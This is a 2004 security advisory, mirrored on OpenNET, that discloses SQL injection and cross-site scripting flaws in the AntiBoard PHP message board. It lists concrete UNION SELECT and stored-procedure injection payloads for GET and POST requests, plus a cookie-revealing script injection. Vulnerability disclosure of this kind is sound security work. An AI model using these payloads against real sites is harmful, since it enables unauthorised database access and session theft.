The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 1 Aug 2004 14:01:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------


SUMMARY

" 
<http://freshmeat.net/redir/antiboard/20085/url_homepage/antiboard_info.php>; AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page."

AntiBoard is vulnerable to the most classic vulnerabilities in dynamic 
pages systems - cross site scripting and SQL injection.

DETAILS

Vulnerable Systems:
 * AntiBoard version 0.7.2 and prior

The antiboard.php main script is vulnerable through it's 'thread_id' and 
it's 'parent_id' parameters. Thus, using a structured HTTP GET query an 
attacker is able to send SQL commands to the backend database server. 
Examples for SQL injection using UNION queries:
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

It is also possible to conduct a stored procedure attack through the use 
of HTTP POST, in the following manner:
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111& 
message_body=1111&submit=Submit%2bmessage&thread_id=3& 
mode=1';%20exec%20whatever--&range=&parent_id=0&reply=reply

And SQL injections through the use of HTTP POST:
POST antiboard.php 
poster_name=1111&poster_email=1111&message_title=1111&message_body=1111& 
submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION ALL select field from antiboard_emails----&reply=reply

In addition to the SQL injection vulnerabilities, AntiBoard is also 
vulnerable to XSS attacks which facilitate the execution of script code in 
the client side of a victim accessing the site. One possible XSS attack 
point is by the following HTTP request (others probably exist):
http:///antiboard.php?thread_id=1&mode=threaded&range=&feedback=<; 
script>alert(document.cookie);</script>

Vendor Status:
The vendor has been informed of the issues on the 28th July however no fix 
is planned in the near future.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> Josh 
Gilmour.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру